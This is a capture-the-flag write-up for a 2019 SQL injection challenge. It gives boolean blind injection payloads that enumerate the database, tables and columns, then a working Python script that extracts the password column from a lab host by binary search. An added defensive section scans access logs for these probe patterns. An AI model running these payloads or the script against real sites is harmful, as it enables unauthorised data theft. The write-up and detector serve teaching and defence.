  • [极客大挑战 2019]finalsql

    ?id=1^ascii(substr(database(),1,1))>97 #    blind-injection payload for the database name

    Probing this way yields the database name geek.

    ?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),1,1))>)#   blind-injection payload for the table names

    This yields the table names F1naI1y,Flaaaaag.

    ?id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='Flaaaaag'),1,1))>99)  blind-injection payload for the column names

    This yields the column names id,username,password and id,fl4gawsl.

    Finally, write a script to extract the data:

    import requests

    url = "http://15d5be57-364a-4e40-ba63-be0f9038ec22.node3.buuoj.cn/search.php?"
    temp = {"id": ""}
    column = ""
    # One character per outer iteration; each character is located by a
    # binary search over the printable ASCII range 32..127.
    for i in range(1, 1000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # 1^(cond)^1 evaluates to cond; "Click" in the response marks the true branch
            temp["id"] = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, mid)
            r = requests.get(url, params=temp)
            # print(low, high, mid, ":")
            if "Click" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        # 32 or 127 means no character matched: end of the string
        if mid == 32 or mid == 127:
            break
        column += chr(mid)
        print(column)

    print("flag=", column)
    # binary search
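A defender-side counterpart, added here and not part of the original writeup: a small detector that scans web-server access-log lines for the probe shape used above (a numeric id XOR-ed with an ascii(substr(...)) comparison, information_schema lookups, group_concat) and counts such requests per client, since a binary search like the script above produces a burst of them. The log lines, client addresses and the threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qs, unquote_plus

# Signatures of the probes in this writeup: space-free boolean blind injection
# built from ascii(substr(...)) comparisons and an XOR against a numeric id.
BLIND_PATTERNS = [
    re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
    re.compile(r"information_schema\.(tables|columns)", re.I),
    re.compile(r"group_concat\s*\(", re.I),
    re.compile(r"^\s*\d+\s*\^\s*\(?"),  # numeric id XOR-ed with an expression
]

# Constructed sample access-log lines (not taken from the original page).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2020:10:00:01 +0000] "GET /search.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jul/2020:10:00:02 +0000] "GET /search.php?id=1%5Eascii(substr(database(),1,1))%3E97 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jul/2020:10:00:03 +0000] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(password))from(F1naI1y)),1,1))%3E80)%5E1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jul/2020:10:00:04 +0000] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(password))from(F1naI1y)),1,1))%3E104)%5E1 HTTP/1.1" 200 98
10.0.0.9 - - [01/Jul/2020:10:00:05 +0000] "GET /search.php?id=42 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def scan_log(text):
    """Return (hits, per-client hit counts); a hit is (client, param, value, matched patterns)."""
    hits, per_client = [], Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.group(1), m.group(2)
        for name, values in parse_qs(urlparse(target).query, keep_blank_values=True).items():
            for raw in values:
                value = unquote_plus(raw)  # second decode catches double-encoded probes
                matched = [p.pattern for p in BLIND_PATTERNS if p.search(value)]
                if matched:
                    hits.append((client, name, value, matched))
                    per_client[client] += 1
    return hits, per_client

def probing_clients(per_client, threshold=3):
    """Clients whose probe count reaches the threshold (constructed default)."""
    return sorted(c for c, n in per_client.items() if n >= threshold)

if __name__ == "__main__":
    hits, per_client = scan_log(SAMPLE_LOG)
    for client, param, value, matched in hits:
        print(client, param, value[:60], len(matched), "signature(s)")
    print("probing clients:", probing_clients(per_client))
```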

  • Original article: https://www.cnblogs.com/CNdate/p/13266827.html